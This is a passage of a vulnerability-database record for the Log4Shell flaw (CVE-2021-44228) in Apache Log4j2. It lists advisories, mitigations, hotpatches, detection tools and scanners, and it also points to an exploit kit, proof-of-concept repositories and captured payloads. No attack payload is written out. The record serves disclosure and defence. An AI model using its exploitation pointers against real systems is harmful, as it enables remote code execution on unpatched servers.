"trust": 0.1,
"url": "https://access.redhat.com/solutions/6577421"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.16.0-0.21.10.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.16.0-0.20.04.1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5197-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.16.0-0.21.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4104"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4104"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5148"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5192-1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5192-2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44832"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=jboss.fuse\u0026version=7.09.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=jboss.fuse\u0026version=7.10.0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45105"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-45105"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0203"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=jboss.fuse\u0026version=7.08.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44832"
},
{
"trust": 0.1,
"url": "https://www.vmware.com/security/advisories/vmsa-2021-0028.html"
},
{
"trust": 0.1,
"url": "http://lists.vmware.com/mailman/listinfo/security-announce"
},
{
"trust": 0.1,
"url": "https://lists.vmware.com/mailman/listinfo/security-announce."
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-407408"
},
{
"db": "PACKETSTORM",
"id": "165295"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "165288"
},
{
"db": "PACKETSTORM",
"id": "165289"
},
{
"db": "PACKETSTORM",
"id": "165297"
},
{
"db": "PACKETSTORM",
"id": "165298"
},
{
"db": "PACKETSTORM",
"id": "165324"
},
{
"db": "PACKETSTORM",
"id": "165329"
},
{
"db": "PACKETSTORM",
"id": "165348"
},
{
"db": "PACKETSTORM",
"id": "165632"
},
{
"db": "PACKETSTORM",
"id": "165371"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-799"
},
{
"db": "NVD",
"id": "CVE-2021-44228"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-407408"
},
{
"db": "VULMON",
"id": "CVE-2021-44228"
},
{
"db": "PACKETSTORM",
"id": "165295"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "165288"
},
{
"db": "PACKETSTORM",
"id": "165289"
},
{
"db": "PACKETSTORM",
"id": "165297"
},
{
"db": "PACKETSTORM",
"id": "165298"
},
{
"db": "PACKETSTORM",
"id": "165324"
},
{
"db": "PACKETSTORM",
"id": "165329"
},
{
"db": "PACKETSTORM",
"id": "165348"
},
{
"db": "PACKETSTORM",
"id": "165632"
},
{
"db": "PACKETSTORM",
"id": "165371"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-799"
},
{
"db": "NVD",
"id": "CVE-2021-44228"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-10T00:00:00",
"db": "VULHUB",
"id": "VHN-407408"
},
{
"date": "2021-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2021-44228"
},
{
"date": "2021-12-15T15:26:54",
"db": "PACKETSTORM",
"id": "165295"
},
{
"date": "2021-12-15T15:20:33",
"db": "PACKETSTORM",
"id": "165286"
},
{
"date": "2021-12-15T15:20:43",
"db": "PACKETSTORM",
"id": "165287"
},
{
"date": "2021-12-15T15:22:36",
"db": "PACKETSTORM",
"id": "165288"
},
{
"date": "2021-12-15T15:23:16",
"db": "PACKETSTORM",
"id": "165289"
},
{
"date": "2021-12-15T15:27:51",
"db": "PACKETSTORM",
"id": "165297"
},
{
"date": "2021-12-15T15:28:00",
"db": "PACKETSTORM",
"id": "165298"
},
{
"date": "2021-12-16T15:20:38",
"db": "PACKETSTORM",
"id": "165324"
},
{
"date": "2021-12-16T15:25:46",
"db": "PACKETSTORM",
"id": "165329"
},
{
"date": "2021-12-17T14:06:52",
"db": "PACKETSTORM",
"id": "165348"
},
{
"date": "2022-01-20T17:49:05",
"db": "PACKETSTORM",
"id": "165632"
},
{
"date": "2021-12-20T16:19:51",
"db": "PACKETSTORM",
"id": "165371"
},
{
"date": "2021-12-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-799"
},
{
"date": "2021-12-10T10:15:09.143000",
"db": "NVD",
"id": "CVE-2021-44228"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-06T00:00:00",
"db": "VULHUB",
"id": "VHN-407408"
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2021-44228"
},
{
"date": "2023-04-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-799"
},
{
"date": "2024-11-21T06:30:38.047000",
"db": "NVD",
"id": "CVE-2021-44228"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165289"
},
{
"db": "PACKETSTORM",
"id": "165348"
},
{
"db": "PACKETSTORM",
"id": "165371"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-799"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache Log4j Code problem vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202112-799"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code execution",
"sources": [
{
"db": "PACKETSTORM",
"id": "165295"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "165288"
},
{
"db": "PACKETSTORM",
"id": "165289"
},
{
"db": "PACKETSTORM",
"id": "165297"
},
{
"db": "PACKETSTORM",
"id": "165298"
},
{
"db": "PACKETSTORM",
"id": "165329"
},
{
"db": "PACKETSTORM",
"id": "165632"
},
{
"db": "PACKETSTORM",
"id": "165371"
}
],
"trust": 1.0
}
}
gsd-2021-44228
Vulnerability from gsd
Modified
2023-12-13 01:23
Details
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Aliases
Aliases
{
"GSD": {
"affected_component": "unspecified",
"alias": "CVE-2021-44228",
"attack_vector": "network",
"credit": "",
"description": "This vulnerability was not correctly fixed \"in certain non-default configuration\" and a new vulnerability and patch have been released, please see GSD-2021-1002353 (CVE-2021-45046). Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. \n\n In log4j 2.15.1 and later JNDI will be disabled by default: \n\n \"Dealing with CVE-2021-44228 has shown the JNDI has significant security issues. While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it. Those who are will need to specify -Dlog4j2.enableJndi=true or the environment variable form of it to use any JNDI components.\" (https://issues.apache.org/jira/browse/LOG4J2-3208) \n\n In previous releases (\u003e2.10) this behavior can be mitigated by setting system property \"log4j2.formatMsgNoLookups\" to \"true\" or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting \"com.sun.jndi.rmi.object.trustURLCodebase\" and \"com.sun.jndi.cosnaming.object.trustURLCodebase\" to \"false\". \n\n Later versions of the Oracle Java JDK are not affected by the LDAP attack vector, but other vectors are available for exploitation: \"JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector but please note this still leaves other attack vectors. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to \"false\" meaning JNDI cannot load remote code using LDAP.\" (https://www.lunasec.io/docs/blog/log4j-zero-day/) \n\n Also please note that log4j version 1.x is not affected by this specific vulnerability it does have a number of known serious security flaws and likely also contains Remote Code Execution vulnerabilities, upgrading it should be investigated. \n\n Hot patches: \n\n There are currently several projects providing hot patches that can modify a running system to remove the vulnerability and are OpenSource licensed allowing them to be easily audited: \n\n Log4jHotPatch \n\n This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded org.apache.logging.log4j.core.lookup.JndiLookup instances to unconditionally return the string \"Patched JndiLookup::lookup()\". It is designed to address the CVE-2021-44228 remote code execution vulnerability in Log4j without restarting the Java process. The dynamic and static agents are known to run on JDK 8 \u0026 11 on Linux whereas on JDK 17 only the static agent is working (see below)\" (https://github.com/corretto/hotpatch-for-apache-log4j2) \n\n Logout4Shell \n\n \"However, enabling these system property requires access to the vulnerable servers as well as a restart. The Cybereason research team has developed the following code that exploits the same vulnerability and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled - this effectively blocks any further attempt to exploit Log4Shell on this server.\" (https://github.com/Cybereason/Logout4Shell) \n\n Detection \n\n Please see the GSD reference links tagged with \"DETECTION\" for more information (there are to many to list here). \n\n TOP LINKS: \n\n Best list of vulnerable software: https://github.com/NCSC-NL/log4shell/tree/main/software\n\n Best list of vulnerable services: https://github.com/YfryTchsGD/Log4jAttackSurface \n\n Best hotpatch:\n\n https://github.com/corretto/hotpatch-for-apache-log4j2 \n\n Best detection:\n\n grep: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\n\n jarhashes: https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes \n\n semgrep: https://github.com/returntocorp/semgrep-rules/pull/1650/commits/ecfc32623eec718d61ec83b9196574f333191008/\n\n yara: https://github.com/timb-machine/log4j/\n\n burpsuite: https://github.com/silentsignal/burp-log4shell \n\n Nmap NSE: https://github.com/Diverto/nse-log4shell\n\n Scanners: \n https://github.com/alexbakker/log4shell-tools\n https://github.com/fullhunt/log4j-scan\n https://github.com/takito1812/log4j-detect\n\nExploitation: \n\n An exploit kit is available at https://github.com/pimps/JNDI-Exploit-Kit and it has also been reported that omitting the closing } can result in data from other requests being sent as some servers with log4j2 will apparently keep sending data until they find a closing }.",
"id": "GSD-2021-44228",
"impact": "remote code execution",
"modified": "2022-09-03T22:57:05Z",
"notes": "",
"product_name": [
"Log4j",
"Log4j2"
],
"product_version": "\u003c=2.14.1",
"references": [
{
"type": "EVIDENCE",
"url": "https://www.suse.com/security/cve/CVE-2021-44228.html"
},
{
"type": "EVIDENCE",
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2022:0203"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2022:0082"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5148"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5141"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5140"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5138"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5137"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5133"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5132"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5130"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5129"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5128"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5127"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5126"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5108"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5107"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5106"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5094"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5093"
},
{
"type": "EVIDENCE",
"url": "https://ubuntu.com/security/CVE-2021-44228"
},
{
"type": "EVIDENCE",
"url": "https://advisories.mageia.org/CVE-2021-44228.html"
},
{
"type": "EVIDENCE",
"url": "https://security.archlinux.org/CVE-2021-44228"
},
{
"type": "EVIDENCE",
"url": "https://alas.aws.amazon.com/cve/html/CVE-2021-44228.html"
},
{
"type": "EVIDENCE",
"url": "https://packetstormsecurity.com/files/cve/CVE-2021-44228"
},
{
"name": "https://twitter.com/stereotype32/status/1469313856229228544",
"type": "EVIDENCE",
"url": "https://twitter.com/stereotype32/status/1469313856229228544"
},
{
"name": "https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/"
},
{
"name": "Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package",
"type": "EVIDENCE",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"name": "https://github.com/tangxiaofeng7/apache-log4j-poc",
"type": "EVIDENCE",
"url": "https://github.com/tangxiaofeng7/apache-log4j-poc"
},
{
"name": "https://news.ycombinator.com/item?id=29504755",
"type": "EVIDENCE",
"url": "https://news.ycombinator.com/item?id=29504755"
},
{
"name": "https://twitter.com/P0rZ9/status/1468949890571337731",
"type": "EVIDENCE",
"url": "https://twitter.com/P0rZ9/status/1468949890571337731"
},
{
"name": "https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/",
"type": "FIX",
"url": "https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/"
},
{
"name": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/",
"type": "EVIDENCE",
"url": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/"
},
{
"name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce"
},
{
"name": "http://mail-archives.us.apache.org/mod_mbox/www-announce/202112.mbox/%3C643bc702-4b46-411b-4980-1fcf637dbb11%40apache.org%3E",
"type": "EVIDENCE",
"url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/202112.mbox/%3C643bc702-4b46-411b-4980-1fcf637dbb11%40apache.org%3E"
},
{
"name": "https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html",
"type": "EVIDENCE",
"url": "https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html"
},
{
"content": "Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2.",
"name": "https://github.com/simonis/Log4jPatch",
"type": "FIX",
"url": "https://github.com/simonis/Log4jPatch"
},
{
"content": "This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded org.apache.logging.log4j.core.lookup.JndiLookup instances to unconditionally return the string \"Patched JndiLookup::lookup()\". It is designed to address the CVE-2021-44228 remote code execution vulnerability in Log4j without restarting the Java process.",
"name": "Log4jHotPatch",
"type": "FIX",
"url": "https://github.com/corretto/hotpatch-for-apache-log4j2"
},
{
"content": "We recommend that those running affected applications upgrade Log4j to version 2.15 to address this vulnerability. However, this isn\u2019t always quick, so folks from the Coretto team spent some time building a tool to hotpatch vulnerable log4j deployments. This tool is designed to hotpatch a running JVM using any Log4j 2.0+. The tool is idempotent, meaning that you can run this multiple times on the same JVM without changing the result past the initial application. This tool also looks for all the running JVMs and attempts to mitigate the vulnerability. You can also use this to patch shaded jars that include log4j as a dependency, and to patch multiple log4j instances on the classpath.",
"name": "Hotpatch for Apache Log4j",
"type": "EVIDENCE",
"url": "https://aws.amazon.com/blogs/opensource/hotpatch-for-apache-log4j/"
},
{
"name": "https://github.com/YfryTchsGD/Log4jAttackSurface",
"type": "EVIDENCE",
"url": "https://github.com/YfryTchsGD/Log4jAttackSurface"
},
{
"name": "https://twitter.com/halvarflake/status/1469318326929272835",
"type": "EVIDENCE",
"url": "https://twitter.com/halvarflake/status/1469318326929272835"
},
{
"name": "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
"type": "EVIDENCE",
"url": "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"
},
{
"name": "https://twitter.com/_JohnHammond/status/1469255402290401285",
"type": "EVIDENCE",
"url": "https://twitter.com/_JohnHammond/status/1469255402290401285"
},
{
"name": "https://logging.apache.org/log4j/2.x/manual/lookups.html",
"type": "EVIDENCE",
"url": "https://logging.apache.org/log4j/2.x/manual/lookups.html"
},
{
"name": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf",
"type": "EVIDENCE",
"url": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf"
},
{
"content": "JNDI (Java Naming and Directory Interface) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services such as RMI, CORBA, LDAP, or DNS.\n\nThis talk will present a new type of vulnerability named \"JNDI Reference Injection\" found on malware samples attacking Java Applets (CVE-2015-4902). The same principles can be applied to attack web applications running JNDI lookups on names controlled by attackers. As we will demo during the talk, attackers will be able to use different techniques to run arbitrary code on the server performing JNDI lookups.\n\nThe talk will first present the basics of this new vulnerability including the underlying technology, and will then explain in depth the different ways an attacker can exploit it using different vectors and services. We will focus on exploiting RMI, LDAP and CORBA services as these are present in almost every Enterprise application.\n\nLDAP offers an alternative attack vector where attackers not able to influence the address of an LDAP lookup operation may still be able to modify the LDAP directory in order to store objects that will execute arbitrary code upon retrieval by the application lookup operation. This may be exploited through LDAP manipulation or simply by modifying LDAP entries as some Enterprise directories allow.",
"name": "A JOURNEY FROM JNDI/LDAP MANIPULATION TO REMOTE CODE EXECUTION DREAM LAND",
"tags": [
"timeline"
],
"timestamp": "2016-08-03",
"type": "EVIDENCE",
"url": "https://www.blackhat.com/us-16/briefings/schedule/#a-journey-from-jndildap-manipulation-to-remote-code-execution-dream-land-3345"
},
{
"name": "https://twitter.com/aksquaretech/status/1469297067948347394",
"type": "EVIDENCE",
"url": "https://twitter.com/aksquaretech/status/1469297067948347394"
},
{
"name": "https://rules.emergingthreatspro.com/open/",
"type": "FIX",
"url": "https://rules.emergingthreatspro.com/open/"
},
{
"name": "RHSB-2021-009 Log4Shell - Remote Code Execution - log4j",
"type": "FIX",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"name": "https://www.suse.com/security/cve/CVE-2021-44228.html",
"type": "FIX",
"url": "https://www.suse.com/security/cve/CVE-2021-44228.html"
},
{
"name": "https://security-tracker.debian.org/tracker/CVE-2021-44228",
"type": "FIX",
"url": "https://security-tracker.debian.org/tracker/CVE-2021-44228"
},
{
"name": "https://ubuntu.com/security/CVE-2021-44228",
"type": "FIX",
"url": "https://ubuntu.com/security/CVE-2021-44228"
},
{
"name": "Log4j RCE: Emergency patch issued to plug critical auth-free code execution hole in widely-used logging utility",
"type": "EVIDENCE",
"url": "https://www.theregister.com/2021/12/10/log4j_remote_code_execution_vuln_patch_issued/"
},
{
"name": "https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce",
"type": "EVIDENCE",
"url": "https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce"
},
{
"name": "https://twitter.com/chvancooten/status/1469340927923826691",
"type": "EVIDENCE",
"url": "https://twitter.com/chvancooten/status/1469340927923826691"
},
{
"name": "VMSA-2021-0028",
"type": "FIX",
"url": "https://www.vmware.com/security/advisories/VMSA-2021-0028.html"
},
{
"name": "https://www.cnblogs.com/yyhuni/p/15088134.html",
"type": "EVIDENCE",
"url": "https://www.cnblogs.com/yyhuni/p/15088134.html"
},
{
"name": "CVE-2021-44228 \u2013 Log4j 2 Vulnerability Analysis",
"type": "EVIDENCE",
"url": "https://www.randori.com/blog/cve-2021-44228/"
},
{
"name": "CVE-2021-44228-Log4Shell-Hashes",
"type": "EVIDENCE",
"url": "https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes"
},
{
"name": "Using Anchore Enterprise to Detect and Prevent Log4Shell, the Log4j Zero-Day Vulnerability",
"type": "EVIDENCE",
"url": "https://anchore.com/blog/using-anchore-enterprise-to-detect-prevent-log4j-zero-day/"
},
{
"name": "How to detect the Log4j vulnerability in your applications",
"type": "EVIDENCE",
"url": "https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html"
},
{
"name": "https://developers.slashdot.org/story/21/12/10/2131259/new-zero-day-in-the-log4j-java-library-is-already-being-exploited",
"type": "EVIDENCE",
"url": "https://developers.slashdot.org/story/21/12/10/2131259/new-zero-day-in-the-log4j-java-library-is-already-being-exploited"
},
{
"name": "https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/",
"type": "EVIDENCE",
"url": "https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/"
},
{
"name": "https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/"
},
{
"name": "https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/"
},
{
"name": "https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/"
},
{
"name": "https://www.wired.com/story/log4j-flaw-hacking-internet/",
"type": "EVIDENCE",
"url": "https://www.wired.com/story/log4j-flaw-hacking-internet/"
},
{
"name": "https://github.com/returntocorp/semgrep-rules/pull/1650/commits/ecfc32623eec718d61ec83b9196574f333191008/",
"type": "EVIDENCE",
"url": "https://github.com/returntocorp/semgrep-rules/pull/1650/commits/ecfc32623eec718d61ec83b9196574f333191008"
},
{
"name": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"name": "https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability"
},
{
"name": "https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability",
"type": "FIX",
"url": "https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability"
},
{
"name": "https://www.reddit.com/r/netsec/comments/re468q/log4shell_using_the_vulnerability_to_patch_the/",
"type": "FIX",
"url": "https://www.reddit.com/r/netsec/comments/re468q/log4shell_using_the_vulnerability_to_patch_the/"
},
{
"name": "Logout4Shell",
"type": "FIX",
"url": "https://github.com/Cybereason/Logout4Shell"
},
{
"name": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/",
"type": "EVIDENCE",
"url": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/"
},
{
"name": "https://github.com/christophetd/log4shell-vulnerable-app",
"type": "EVIDENCE",
"url": "https://github.com/christophetd/log4shell-vulnerable-app"
},
{
"name": "https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22",
"type": "EVIDENCE",
"url": "https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22"
},
{
"name": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/",
"type": "EVIDENCE",
"url": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/"
},
{
"name": "https://twitter.com/canrevagency/status/1469487239671468033",
"type": "EVIDENCE",
"url": "https://twitter.com/canrevagency/status/1469487239671468033"
},
{
"name": "https://twitter.com/sans_isc/status/1469653801581875208",
"type": "EVIDENCE",
"url": "https://twitter.com/sans_isc/status/1469653801581875208"
},
{
"name": "https://twitter.com/rayhan0x01",
"type": "EVIDENCE",
"url": "https://twitter.com/rayhan0x01"
},
{
"name": "https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592",
"type": "EVIDENCE",
"url": "https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592"
},
{
"name": "https://twitter.com/lukolejnik/status/1469327074271899652",
"type": "EVIDENCE",
"url": "https://twitter.com/lukolejnik/status/1469327074271899652"
},
{
"name": "https://twitter.com/cyb3rops/status/1469405846010572816",
"type": "EVIDENCE",
"url": "https://twitter.com/cyb3rops/status/1469405846010572816"
},
{
"name": "Akamai",
"type": "ADVISORY",
"url": "https://www.akamai.com/blog/news/CVE-2021-44228-Zero-Day-Vulnerability"
},
{
"name": "Apache Druid",
"type": "ADVISORY",
"url": "https://github.com/apache/druid/pull/12051"
},
{
"name": "Apache Flink",
"type": "ADVISORY",
"url": "https://flink.apache.org/2021/12/10/log4j-cve.html"
},
{
"name": "Apache LOG4J",
"type": "ADVISORY",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"name": "Apache Kafka",
"type": "ADVISORY",
"url": "https://lists.apache.org/thread/lgbtvvmy68p0059yoyn9qxzosdmx4jdv"
},
{
"name": "Apache Solr",
"type": "ADVISORY",
"url": "https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228"
},
{
"name": "Apero CAS",
"type": "ADVISORY",
"url": "https://apereo.github.io/2021/12/11/log4j-vuln/"
},
{
"name": "Aptible",
"type": "ADVISORY",
"url": "https://status.aptible.com/incidents/gk1rh440h36s?u=zfbcrbt2lkv4"
